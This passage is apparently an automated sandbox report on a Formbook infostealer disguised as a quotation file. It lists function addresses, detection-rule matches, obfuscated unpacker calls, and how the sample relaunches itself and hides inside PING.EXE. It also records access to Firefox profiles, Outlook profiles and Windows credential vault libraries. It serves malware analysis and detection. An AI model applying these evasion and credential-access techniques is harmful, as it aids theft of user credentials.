            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9F0E09_2_02C9F0E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE70C09_2_02BE70C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BEB1B09_2_02BEB1B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02CAB16B9_2_02CAB16B
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C1516C9_2_02C1516C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BCF1729_2_02BCF172
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C916CC9_2_02C916CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9F7B09_2_02C9F7B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BD14609_2_02BD1460
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9F43F9_2_02C9F43F
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C7D5B09_2_02C7D5B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C975719_2_02C97571
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C8DAC69_2_02C8DAC6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C25AA09_2_02C25AA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C7DAAC9_2_02C7DAAC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C81AA39_2_02C81AA3
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9FA499_2_02C9FA49
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C97A469_2_02C97A46
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C53A6C9_2_02C53A6C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C55BF09_2_02C55BF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C1DBF99_2_02C1DBF9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BFFB809_2_02BFFB80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9FB769_2_02C9FB76
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE38E09_2_02BE38E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C4D8009_2_02C4D800
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C759109_2_02C75910
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE99509_2_02BE9950
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BFB9509_2_02BFB950
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE9EB09_2_02BE9EB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE1F929_2_02BE1F92
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BA3FD29_2_02BA3FD2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BA3FD59_2_02BA3FD5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9FFB19_2_02C9FFB1
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9FF099_2_02C9FF09
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9FCF29_2_02C9FCF2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C59C329_2_02C59C32
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BFFDC09_2_02BFFDC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C91D5A9_2_02C91D5A
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C97D739_2_02C97D73
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE3D409_2_02BE3D40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_004817009_2_00481700
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_0047C6209_2_0047C620
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_0047C8409_2_0047C840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_0047A8C09_2_0047A8C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00484DC09_2_00484DC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00482F9B9_2_00482F9B
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00482FA09_2_00482FA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_0049B4409_2_0049B440
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02EFE6339_2_02EFE633
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02EFE5189_2_02EFE518
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02EFDA389_2_02EFDA38
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02EFCBAA9_2_02EFCBAA
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02EFE9CC9_2_02EFE9CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02EFCCC89_2_02EFCCC8
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 02C27E54 appears 102 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 02C5F290 appears 105 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 02BCB970 appears 280 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 02C4EA12 appears 86 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 02C15130 appears 58 times
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: String function: 00FB7E54 appears 102 times
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: String function: 00F5B970 appears 280 times
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: String function: 00FA5130 appears 58 times
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: String function: 00FEF290 appears 105 times
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: String function: 00FDEA12 appears 86 times
            Source: Quotation-27-08-24.exe, 00000000.00000002.2128451347.0000000004819000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2131377102.0000000005990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2118987624.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2117970440.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2118987624.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2132326848.0000000009AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000000.2107622896.0000000000A5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePUQD.exe> vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameping.exej% vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000004.00000002.2470704113.000000000105D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameping.exej% vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exeBinary or memory string: OriginalFilenamePUQD.exe> vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Quotation-27-08-24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, EwT4tW5uadbjQJAJ5v.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, EwT4tW5uadbjQJAJ5v.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, EwT4tW5uadbjQJAJ5v.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@15/14
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation-27-08-24.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\PING.EXEFile created: C:\Users\user\AppData\Local\Temp\Z426iIL7Jump to behavior
            Source: Quotation-27-08-24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Quotation-27-08-24.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PING.EXE, 00000009.00000002.4566598381.0000000000735000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2649294273.0000000000740000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4566598381.0000000000763000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2646768523.0000000000735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quotation-27-08-24.exeVirustotal: Detection: 33%
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"Jump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Quotation-27-08-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Quotation-27-08-24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uExImirYECsTjI.exe, 00000008.00000002.4568881862.0000000000F9E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Quotation-27-08-24.exe, Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdb source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Quotation-27-08-24.exe, Form2.cs.Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.7450000.8.raw.unpack, PingPong.cs.Net Code: _202B_206B_206C_202A_206A_202A_200D_200F_200B_202D_206D_202A_206D_206E_206A_202B_200F_200D_202B_202B_202D_206C_200F_206C_206A_206E_200C_202D_206F_206D_206A_202D_200C_200D_200E_206D_200E_202D_206E_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs.Net Code: TilkD3ufsn System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs.Net Code: TilkD3ufsn System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.3e245c0.5.raw.unpack, PingPong.cs.Net Code: _202B_206B_206C_202A_206A_202A_200D_200F_200B_202D_206D_202A_206D_206E_206A_202B_200F_200D_202B_202B_202D_206C_200F_206C_206A_206E_200C_202D_206F_206D_206A_202D_200C_200D_200E_206D_200E_202D_206E_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs.Net Code: TilkD3ufsn System.Reflection.Assembly.Load(byte[])
            Source: 8.2.uExImirYECsTjI.exe.33ccd14.1.raw.unpack, Form2.cs.Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
